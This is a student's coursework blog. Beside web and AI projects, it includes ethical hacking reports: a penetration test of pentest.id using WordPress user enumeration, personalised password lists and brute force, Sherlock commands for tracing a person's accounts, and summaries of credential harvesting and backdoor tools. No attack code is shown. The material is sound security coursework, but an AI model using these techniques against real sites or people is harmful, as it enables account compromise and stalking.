Projects:

Intelligent Systems

http://2201797001chan.blog.binusian.org/category/projects/intelligent-systems/

Web Application

http://2201797001chan.blog.binusian.org/category/projects/web-application/

Multimedia

http://2201797001chan.blog.binusian.org/category/projects/multimedia/

Databases System

http://2201797001chan.blog.binusian.org/category/projects/database-system/

Ethical Hacking

http://2201797001chan.blog.binusian.org/category/projects/ethical-hacking/

Network Forensics

http://2201797001chan.blog.binusian.org/category/projects/network-forensic/

Posted in Projects | Leave a comment

Attention!

All tools, guidance, and tutorials in this blog are for education only.

Posted in Ethical Hacking | Leave a comment

Web Application Development & Security

Golden Leaf Residence Website

A website where the residents are able to file complaints, book the swimming pool or function hall, as well as receive updates. It is user-friendly.

The front-end service hosts the user interface of the app. This service is built using an Angular framework with a bootstrap template. To run it in localhost, run ng serve. To build the project, run ng build.

Front-end Source Code: https://github.com/ChanElizabeth/frontend

The backend service contains the APIs that are used to do basic CRUD, login, and log out in the frontend services. This service is built using the Laravel framework with passport authentication. We used MySQL as the database to store the data. To run it in localhost, PHP artisan serve.

Back-end Source Code: https://github.com/ChanElizabeth/backend

Posted in Web Application | Leave a comment

Intelligent System Final Project

By Chan Elizabeth W, Gadiza Namira Putri Andjani, and Winson Wardana

  • The main program code is presented in the main.py
  • The code for training the model is presented in the 2 Jupyter notebooks. (trainimgModel.ipynb and trainemotionModel.ipynb)
  • The haarcascade_frontalface_default.xml is used to detect the frontal face. It is a stump-based 24×24 discrete AdaBoost frontal face detector. It is created by Rainer Lienhart.
  • The shape_predictor_68_face_landmarks.dat is a pre-trained facial landmark detector inside the dlib library used to estimate the location of 68 (x, y)-coordinates that map to facial structures on the face. The indexes of the 68 coordinates can be visualized on the image: https://www.pyimagesearch.com/wp-content/uploads/2017/04/facial_landmarks_68markup-1024×825.jpg
  • The Eyefilter.py is the code for coordinating and storing the eye positions from the dlib facial landmark detector. It is used to locate the eyes of the person for the filter.
  • The Additional Pre-trained model file contains our additional trained models. One for the emotion detection and the other one for the image classification.
  • The Filter file contains the images that we used as a filter for the face filter based on emotion detection.
  • The ImageTest file contains the images that we take from google and we used to test the model prediction based on the image classification.

Source code: https://github.com/ChanElizabeth/IS-Final-Project

Posted in Intelligent Systems | Leave a comment

Network Forensic Weekly Report

Week 1

This week, we learned about the introduction of network forensics.

Network forensics is a division of digital forensics. It mainly focuses on a monitor and analyzes network traffic. The purposes are:

  • Intrusion Detection/Prevention
  • Information Gathering
  • Legal Evidence

The difference between the computer and network forensics:

Computer Forensics

•Data is not much change for daily usage

•Evidence is contained within the file system

•Easy to perform a forensically sound acquisition

•Seizing one or several computers would not make a deep impact on the business

Network Forensics

•Data is much changing constantly

•Evidence sometime exists only in RAM

•Most network devices do not have non-volatile storage

•Taking network devices would be problematic

We need network forensics as a part of incident responses to find out when an incident occurred, how long the incident occurred, what sensitive/confidential data was taken, how many systems were affected and question if there any ongoing incident. Network forensics also needed to find the root cause of the incident and to collect evidence to bring justice

The investigative methodologies of network forensics are OSCAR and TAARA. With these methodologies, investigators can perform network forensics and achieve investigation goals.

Posted in Network Forensic | Leave a comment

Ethical Hacking Penetration Testing Final Project

Penetration testing target: pentest.id

The basic penetration testing process was used for this project. There were 4 processes: Discovery/Reconnaissance, Scanning, Exploitation, and Post-Exploitation. (5 Important Questions to Ask Your Next Penetration Tester, 2015).

The main purpose of this testing:

  • Discover the vulnerabilities based on the findings using certain tools that provide us with certain information that is visible only by enumerating the website with blackbox approach.
  • Attempt to break into the website using the vulnerabilities discovered.

The tools used for this testing:

Online platforms:

  • Pentest-Tools.com
  • Sucuri
  • UpGuard
  • Observatory 
  • Censys
  • Google

Kali Linux tools:

  • Nikto 
  • Whatweb
  • Nmap
  • Owasp Zap
  • Skipfish
  • Wpscan
  • Cupp
  • Metasploit

I found quite a lot of findings but I could not explain it all in this blog. So, I only showed some of the findings below using some tools mention above.

This was Observatory, one of the online platforms I used. It showed that certain conditions and security HTTP headers to keep the website safes were not implemented
This was the WPScan, we found private files exposed which were the robots.txt and readme.html.
We found the server software and its version which was WordPress 4.7.3. We also found the theme used by the website which was longevity.
We identified the users of the website.

I tried to find the passwords using a brute force attack after I got the valid usernames using the same tool with the help of cupp to generate the list of possible passwords.

I inputted the information about the website owner as cupp asked about it to generate the possible passwords
This is the code to run the brute force with the valid username that was identified

I also tried to brute force the FTP server using Metasploit.

It stopped attacking after the connection was lost

We found the vulnerabilities of the website:

Due to Software outdated. (Pentest-Tools.com, 2020)

Due to missing HTTP headers (Content Security Policy, X-XSS-Protection, HSTS, X-Content-Type-Options, and X-Frame-Options):

  • Cross-site scripting (XSS) 
  • Clickjacking
  • MIME Sniffing downgrade attacks
  • SSL-stripping man-in-the-middle attacks
  • Cookie-hijacking protections weakening.

Unfortunately, I did not manage to break into the website as I cannot find the passwords of the username and XMLRPC Denial of Service had failed to provide us with more valuable information and give us access to the website.

In conclusion, the risk is medium as it is hard to break into the website. However, attackers may design their attacks based on the software server was outdated and that’s why it needs to be updated. The features and components of the website are easily found which need to be avoided such as disabling features like wp-cron.php that may cause vulnerabilities and remove entries from the exposed file like robots.txt. The owner also needs to implement the missing HTTP headers to avoid vulnerabilities.

References:

5 Important Questions to Ask Your Next Penetration Tester. (2015). Retrieved 18 June 2020, from https://blog.redcanari.com/2015/10/26/top-5-questions-to-ask-your-next-penetration-tester/

Pentest-Tools.com. (2020). Website Vulnerability Scanner Report (Light). Pentest-Tools.com.

Posted in Ethical Hacking | Leave a comment

Ethical Hacking Weekly Report

Week 1

This week was our first meeting. We were introduced to the course. We were also informed about the projects that need to be complete to pass this course.

Week 2

This week, we learned about information gathering included target scoping. The objectives of the week were using web tools for footprinting, conduct competitive intelligence, and describe DNS zone transfers. We practiced certain web tools such as Whois, Sam Spade, Dig, Host, and Paros.

Week 3

This week, we learned about utilizing search engines. The objectives of the week were using Kali Linux tools to search on the Internet and gather the necessary information about the target. We practiced Kali Linux tools such as theharvester, maltego, and google dorks.

Week 4

This week, we learned about target discovery. We learned about port scanning, Idle scan, IPID prediction, OS fingerprinting, and TCP/IP stack fingerprinting. We practiced nmap and dnstrails.com for this week. We also tried to find real IP behind the firewall.

Week 5

This week, we learned about enumerating target. We practiced it using nbtscan, netbios, net view, net use, dumpSec, hyena , wpscan, and jooscan. We also reviewed the previous tools which were theharvester and nmap.

Week 6

This week, we learned about vulnerability mapping. We learned different types of vulnerabilities. We practiced the mapping using Burp Suite.

Week 7

This week, we learned about the Social Engineering Toolkit (SET). We learned the definition and how to install it. We learned and practiced one of the SET methods which was Credential Harvester. We practiced it step.-by-step. Then, we did the task given where we need to explain the step-by-step of another method, the advantages, and disadvantages. I chose Web Jacking Attack Method to be explained.

Week 8

This week, we continued to learn about social engineering. We practiced step-by-step the SET methods again. Before that, we recalled the previous weeks’ topics.

Week 9

This week, we learned about target exploitation. We learned how to do vulnerabilities research and the skills required. Then, we practiced several exploit websites. At last, we practiced exploitation using the Metasploit tool with the exploit method and also searchsploit.

Week 10

This week, we learned about privilege escalation. We learned how to attack the passwords. There two types of password attacks offline attacks and online attacks In offline attacks, hackers need physical access to the machine to be able to perform this attack, whereas, in an online attack, the attack can be done from a remote location. The tools used in an offline attack could be  John the Ripper or Ophcrack. The tools used in the online attack could be Hydra or Wireshark. We also learned about network spoofing tool, Arpspoof, and Ettercap.

Week 11

This week, we learned about maintaining access. It is useful as we do not need Reinventing the wheel, previous vulnerabilities already patched, Sysadmin hardens the system, and saving the time. However, it is unethical after we did the penetration testing. We can create OS Backdoors, Tunnelling, and Web Based Backdoors to maintain access. The example of the tools is Cymothoa, nc / netcat, WeBaCoo, and Weevely.

Posted in Ethical Hacking | Leave a comment

Ethical Hacking – Individual Assignment

The tool used – Sherlock

Sherlock is a tool that can be used to find social media accounts across many varieties’ websites that may be related to the real target. Each social media may contain links to others that use different screen names and provide us with new information that can be. Images from profile photos are easy to put into a reverse image search, allowing you to find other profiles using the same image whenever the target has a preferred profile photo.

The additional tool needed to make Sherlock work:

Python 3.6 or higher

Step-By-Step:

  1. Open Kali Linux and launch the terminal.
  • Installation:
  1. Clone the repository “sherlock” provided by the “sherlock-project”. In the terminal, enter git clone https://github.com/sherlock-project/sherlock.git.
  • After finished cloning, enter ls command to view the content of the directory.
  • We can see that the sherlock tool present in the directory and we change the working directory to sherlock by entering cd sherlock in the terminal.
  •  Install python3 and python3-pip if they are not installed (I already installed).
  • Install the requirements by entering python3 -m pip install -r requirements.txt in terminal.
A screenshot of a cell phone

Description automatically generated
A screenshot of a cell phone

Description automatically generated
A screenshot of a cell phone

Description automatically generated
  • Usage:
  1. In the terminal, enter python3 sherlock –help to view the way to use the tool
  • Then to run this tool and search for users in the terminal:
  • Enter “python3 sherlock {{username}}” to search one user.

Example: python3 sherlock elizabethchan

  • Enter “python3 sherlock {{username username username}}” to search for more than one user.

Example: python3 sherlock elizabethchan elizabethw chanelizabeth

A screenshot of a computer screen

Description automatically generated
A screenshot of a computer screen

Description automatically generated
A screenshot of a computer screen

Description automatically generated

From the result of the search above, I used my own username as my target. The Sherlock tool had successfully found my accounts on several websites including Duolingo. Eventually, I also got additional results of usernames to belong to people with similar names and I can find out about them.

Posted in Ethical Hacking | Leave a comment

Intelligent Systems Weekly Report

Week 1

This week is the first session of the Intelligent Systems class. We learned the introductory to AI. We also formed a group for the final project.


Week 2

This week, I and Diza have started the research for the final project. We found multiple examples that gave us an idea for our final project.


Week 3

This week, We added Winson to our final project team. We have narrow our options to three project ideas. The project ideas are handwritten digit recognition, age & gender detection and face filter software.


Week 4

This week, We studied AI games, Game playing as search, Minimax algorithm, Alpha-Beta pruning, Using heuristics and evaluation function, Non-deterministic games and State-of-the-Art game programs. I also keep on searching for ideas for the face filter software.


Week 5

This week, We learned about supervised and unsupervised machine learning, obtaining and interpreting probabilities. We did an exercise about a joint probability distribution, conditional probability, and Naïve Bayes Classifier.


Week 6

This week, We learned more about supervised and unsupervised machine learning. We also learned about different types of clustering techniques including partitional and hierarchal algorithms. Then, we did an exercise on the K-Means algorithm and initial cluster centroid.


Week 7

This week, We learned about market basket analysis and different algorithms of association rules. We learned the brute force approach and the apriori algorithm. Then, we did an exercise on the apriori algorithm and we have a quiz on what we have learned from week 1 to 7.

Posted in Intelligent Systems | Leave a comment

My contribution to database system final project

I contributed to this project by making the staff and customer UI and controller, making the main menu UI and functions with Marco, making the ERD diagram. Along with other group members, we made the project report together.

Posted in Database System | Leave a comment